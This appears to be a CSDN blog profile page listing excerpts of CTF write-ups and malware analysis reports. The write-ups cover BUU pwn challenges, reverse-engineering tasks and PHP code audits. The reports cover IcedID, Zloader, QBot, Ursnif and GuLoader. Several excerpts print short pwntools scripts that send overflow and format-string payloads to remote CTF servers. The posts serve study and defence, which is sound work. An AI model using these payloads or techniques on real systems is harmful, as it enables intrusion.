3 playmak3r

尚未进行身份认证

我要认证

patient

等级
TA的排名 12w+

羊城杯-RE

loginpyinstaller打包,用工具解一下,得到login.pyc修复一下文件头,反编译解方程组。from z3 import *s=Solver()code=[BitVec(('x%d'%i),32) for i in range(14)]a1 = code[2]a2 = code[1]a3 = code[0]a4 = code[3]a5 = code[4]a6 = code[5]a7 = code[6]a8 = code[7]a9 = code[9]a10 = co

2020-09-12 20:15:42

ICEID

文章目录基本信息样本基本信息主要执行流程office宏pfsdnskdf.exe解密exe傀儡进程关键技术概览1.时间差检测2.cpuid3.隐写术4.傀儡进程5.浏览器注入6.流量混淆详细分析宏代码部分PFSDNSKDF.EXE微步云在线分析手动分析PFSDNSKDF.EXE下载解密文件分析微步云在线分析手动分析新shellcode傀儡进程火绒剑分析开启监听端口生成自签名证书对谷歌浏览器执行远线程注入手动分析其他参考链接基本信息样本基本信息文件名称fram.doc样本类型doc

2020-08-31 20:32:57

Zloader分析

文章目录Zloader分析报告基本信息样本基本信息主要执行流程关键技术概览详细分析工具静态分析动态调试分析Zloader分析报告基本信息样本基本信息名称order_93.xls样本类型xls恶意类型加载器样本MD5ea2a84383a2ef3bdcea801e0f22a0072样本SHA1f74d0b4ac53ac4a9d898a77fb050328495b971f3主要执行流程样本启用excel4.0宏,进行一系列反沙箱行为之后,创建vbs下载

2020-08-31 19:44:59

QBOT分析

QBOT分析报告文章目录QBOT分析报告基本信息主要执行流程关键技术概览反沙箱傀儡进程DLL详细分析vbs分析新vbs分析DLL分析新exe傀儡进程参考资料基本信息样本名称qakbot样本类型vbs恶意类型蠕虫远控样本MD52a4a6cc8bd52f618a0190a8529c82b7d样本SHA1ef3d638377e245d7f388b41aad5e3525a8ccd2ed主要执行流程样本是一封钓鱼邮件,下载文件是一个VBS文件,VBS开启了严

2020-08-31 19:28:38

ursnif分析

ursnif文章目录ursnif基本信息主要执行流程关键技术概览详细分析docexe网络连接动态调试基本信息样本名称5f894602e88263e34dcdbb2eb2da3078.doc样本类型doc恶意类型蠕虫远控MD5cc7ceb281d0780a1514f99a635ca35e4SHA2563122695bb31fa85dc8ff21b6f5f2ded5a1f306ea2520edafd44a653b2d277eef主要执行流程程序启动do

2020-08-31 19:20:22

GuLoader分析报告

GuLoader分析报告文章目录GuLoader分析报告基本信息样本基本信息主要执行流程关键技术概览反虚拟机1.内存遍历检测字符串2.qemu-ga.exe3.窗口数量检测反逆向分析1.花指令2.反调试DLL函数加载反HOOK1.检测一2.检测二3.检测三4,检测四傀儡进程加密特征详细分析加载器部分傀儡进程部分行为检测修复HOOK&HOOK检测概述可行性窗口数检测概述可行性傀儡进程检测概述可行性qemu-ga.exe检测概述可行性反调试检测ZwSetInformationThread概述可行性pa

2020-06-23 13:28:11

instr.scr样本分析

instr.scr样本分析报告文章目录instr.scr样本分析报告基本信息主要执行流程关键技术概览反沙箱详细分析instr.scrservices.exe参考链接基本信息主要执行流程instr.scr加了upx壳进行自我复制改名为java.exe,并设置自启动,且获取通讯录进行邮件传发送播自身。instr.scr同时会释放services.exe同样加了upx壳,设置自启动,且将自身作为服务端与外界进行通讯实现远控。关键技术概览反沙箱程序创建java.exe,删除,再将自身拷贝为java

2020-06-23 13:19:53

进程创建期修改PE输入表法注入

进程创建期修改PE输入表法注入程序定义CImage类内部包含了一些有关PE结构的变量和一些函数函数列表如下findImagebase()AttachToProcess()InitializePEHeaders()AddNewSectionToMemory()LocateSectionByRVA()ALIGN_SIZE_UPALIGN_SIZE_UP(Size,Alignment...

2020-03-29 20:52:15

BUU刷题(三)

BUU刷题(三)fmfrom pwn import *context.log_level='debug'p=process('./fm')p=remote("node3.buuoj.cn","27782")payload=p32(0x0804a02c)+'%11$n'p.sendline(payload)p.interactive()others_shellcode拿到题目直...

2020-03-13 22:10:19

IAT结构分析

IAT结构分析IAT介绍解决兼容问题(不同机器的dll版本不同,地址自然不同),操作系统就必须提供一些措施来确保可以在其他版本的Windows操作系统,以及DLL版本下也能正常运行。这时IAT(Import Address Table:输入函数地址表)就应运而生了。IAT定位手工寻找利用PEview找到程序的NT头的可选头内有个import table此处记录了其RVA。根据结构体...

2020-03-13 22:08:44

office-栈溢出漏洞简单汇总

CVE-2017-1182关键词:rtf,公式编辑器,拷贝未检测长度,ACTIVEX控件解析漏洞原理:在读入公式的Font Name数据时,在将Name拷贝到一个函数内局部变量的时候没有对Name的长度做校验,从而造成栈缓冲区溢出漏洞函数:漏洞存在于EQNEDT21.EXE公式编辑器的sub_41160F函数中,我们将其拖进IDA,找到漏洞点,可以看到伪代码如下,这里没有对长度进行检验...

2020-02-07 19:07:30

BUU PWN (二)

BUU PWN (二)level0from pwn import *#p=process('./level0')p=remote("node3.buuoj.cn","26684")p.recvline()payload='a'*0x80+'a'*8+p64(0x400596)p.sendline(payload)p.interactive()ciscn_2019_n_5ret...

2020-02-07 15:29:49

BUU PWN(一)

test_your_nc连上即可拿到shellripfrom pwn import *context.log_level='debug'#p=process('./17pwn1')p=remote("node3.buuoj.cn","26137")p.recvuntil("please input\n")payload='a'*0xf+'a'*8+p64(0x401186)p.s...

2020-01-28 20:37:49

ichunqiu圣诞欢乐赛babyre

ichunqiu圣诞欢乐赛babyre程序关键函数在此此处是一些有关于多线程的函数,正好借此机会学习一下,顺便学习了一下多线程调试文章如下https://bbs.pediy.com/thread-254194.htm多线程CreateThread函数为创建线程,创建线程成功即运行这个线程。其中第三个参数为指向线程函数的指针第四个参数为向线程函数传递的参数WaitForSingle...

2020-01-06 15:12:46

internal chat圣诞欢乐赛

internal chat拿到题目开启的保护为很容易联想到覆写got表来getshell首先给注册一个用户,用户的结构体如下struct user{ char *user_name; __int64 age; char description[0x100]; _QWORD *addr; _QWORD *friend_addr; __in...

2020-01-05 15:56:59

frame faking

int __cdecl main(int argc, const char **argv, const char **envp){ char buf; // [rsp+0h] [rbp-40h] setbuf(stdin, 0LL); setbuf(_bss_start, 0LL); setbuf(stderr, 0LL); puts("Input Your Name:"...

2019-07-04 22:12:07

巅峰极客snote

巅峰极客snote链接:https://pan.baidu.com/s/1aAb4JjplV-MBj8iQCauI2Q提取码:977o复制这段内容后打开百度网盘手机App,操作更方便哦查看保护&大致逻辑是一个选单程序,且保护全开功能分析1.add2.showdword_202014为1,只能泄露一次3.deletedword_202010只能free一次,且...

2019-11-09 01:21:08

RC4变种算法分析

RC4算法分析及其变种链接:https://pan.baidu.com/s/1IBKy1mYugLxsoupbMGeXnA提取码:4b1b复制这段内容后打开百度网盘手机App,操作更方便哦题目Main流程大致如下 sub_402690(*(_QWORD *)&argc, argv, envp); v10 = 'i esaelP'; v11 = 'eht tupn'; ...

2019-09-30 01:09:18

CTF-wiki bin.exe 反调试练习

CTF-wiki bin.exe 反调试练习主函数大致逻辑如下:int __cdecl main(int argc, const char **argv, const char **envp){ FILE *v3; // eax HANDLE v4; // eax int v11; // [esp+C4h] [ebp-A8h] DWORD v12; // [esp+D4h] ...

2019-09-29 20:21:56

BUGKU 代码审计练习

BUGKU 代码审计练习extract变量覆盖<?php$flag=flag.txt;extract($_GET);//数组键名作为变量名,使用数组键值作为变量值if(isset($shiyan))//检测变量是否为空{ $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{...

2019-08-30 16:16:20

查看更多

勋章 我的勋章
  • 签到新秀
    签到新秀
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 阅读者勋章Lv1
    阅读者勋章Lv1
    授予在CSDN APP累计阅读博文达到3天的你,是你的坚持与努力,使你超越了昨天的自己。
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv3
    勤写标兵Lv3
    授予每个自然周发布7篇到8篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 学习力
    学习力
    《原力计划【第二季】》第一期主题勋章 ,第一期活动已经结束啦,小伙伴们可以去参加第二期打卡挑战活动获取更多勋章哦。